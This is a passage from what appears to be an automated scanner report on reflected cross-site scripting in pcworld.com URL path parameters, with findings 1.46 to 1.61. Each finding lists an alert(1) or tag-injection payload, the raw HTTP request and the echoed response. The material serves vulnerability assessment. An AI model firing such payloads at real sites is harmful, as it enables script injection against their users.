Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/cell_phones_voip/cell_phones.html37b5e'-alert(1)-'91a3468e022';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.46. http://www.pcworld.com/businesscenter/index/office_hardware.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d3d'-alert(1)-'2751cb2a281 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/office_hardware.html71d3d'-alert(1)-'2751cb2a281 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4EEA58D7998E8C5D641A20A1A2DB48E8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:50 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware.html71d3d'-alert(1)-'2751cb2a281';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.47. http://www.pcworld.com/businesscenter/index/office_hardware.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1f8"><script>alert(1)</script>bf48b0f0986 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/office_hardware.htmlde1f8"><script>alert(1)</script>bf48b0f0986 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A88C52CD11DCB9119F8AE29A661550FD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:47 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/office_hardware.htmlde1f8"><script>alert(1)</script>bf48b0f0986"/>
...[SNIP]...

1.48. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79f9"><a>c3cb83bdc67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardwaree79f9"><a>c3cb83bdc67/printers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:18 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2E501C37E550E762D607A3AE378BB2AA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:17 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/office_hardwaree79f9"><a>c3cb83bdc67/printers.html"/>
...[SNIP]...

1.49. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9713'-alert(1)-'ba7f19ad7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/office_hardwarec9713'-alert(1)-'ba7f19ad7a3/printers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:32 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=78420FEF70A9CC9E5E18C671BE289D1E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:32 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
Email = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardwarec9713'-alert(1)-'ba7f19ad7a3/printers.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.
...[SNIP]...

1.50. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed9a3'-alert(1)-'d62d91c468f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/office_hardware/printers.htmled9a3'-alert(1)-'d62d91c468f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9B5164F238777CB2E67C2812CB1D0C54; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:49 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
adCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware/printers.htmled9a3'-alert(1)-'d62d91c468f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.51. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ca8"><a>c2922f46311 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardware/printers.html37ca8"><a>c2922f46311 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B99149D866339F3E62FD22C33D0EC3D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:33 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
splay:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/office_hardware/printers.html37ca8"><a>c2922f46311"/>
...[SNIP]...

1.52. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd12"><a>998397dc8ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardware5bd12"><a>998397dc8ea/tablets.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:40 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:39 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/office_hardware5bd12"><a>998397dc8ea/tablets.html"/>
...[SNIP]...

1.53. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86d0a'-alert(1)-'7c12061bbf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/office_hardware86d0a'-alert(1)-'7c12061bbf1/tablets.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:52 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=52FBCBEA979D0BEA6BA595DEA53F3DFC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:52 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
Email = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware86d0a'-alert(1)-'7c12061bbf1/tablets.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.l
...[SNIP]...

1.54. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee90"><a>ed15d72cfea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardware/tablets.html2ee90"><a>ed15d72cfea HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3F6F33428F27CAF4C20C93E2AE1FF9BE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:53 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
isplay:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/office_hardware/tablets.html2ee90"><a>ed15d72cfea"/>
...[SNIP]...

1.55. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86f6b'-alert(1)-'3cebc29110c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/office_hardware/tablets.html86f6b'-alert(1)-'3cebc29110c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D064911C8EF6EAC04B14CF4830DE2FC5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:06 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
eadCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware/tablets.html86f6b'-alert(1)-'3cebc29110c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.56. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae75'-alert(1)-'f572c4d253d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/operating_systems5ae75'-alert(1)-'f572c4d253d/linux_unix.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:46:05 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=CD9F6840F9463B41CF465693455607D2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:04 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/operating_systems5ae75'-alert(1)-'f572c4d253d/linux_unix.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pc
...[SNIP]...

1.57. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46012"><a>071b612e1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/operating_systems46012"><a>071b612e1d/linux_unix.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:45:40 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:40 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
mg style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/operating_systems46012"><a>071b612e1d/linux_unix.html"/>
...[SNIP]...

1.58. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7d18'-alert(1)-'2ed455a770c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/operating_systems/linux_unix.htmlc7d18'-alert(1)-'2ed455a770c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DCEC59128B31E1CEC344D97FB2E6803; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:19 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/operating_systems/linux_unix.htmlc7d18'-alert(1)-'2ed455a770c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.59. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d31a"><a>9d91ed19f41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/operating_systems/linux_unix.html3d31a"><a>9d91ed19f41 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:05 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
y:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/operating_systems/linux_unix.html3d31a"><a>9d91ed19f41"/>
...[SNIP]...

1.60. http://www.pcworld.com/businesscenter/index/security.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/security.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b07d6"><script>alert(1)</script>60b33eb97b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/security.htmlb07d6"><script>alert(1)</script>60b33eb97b4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E68B670A1E2293905CA8B69D2D4D5D84; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:10 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/security.htmlb07d6"><script>alert(1)</script>60b33eb97b4"/>
...[SNIP]...

1.61. http://www.pcworld.com/businesscenter/index/security.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/security.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bde1'-alert(1)-'ce8c4f271bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/security.html6bde1'-alert(1)-'ce8c4f271bd HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C6A36236607C43AE5ED971C8654B1148; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:12 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
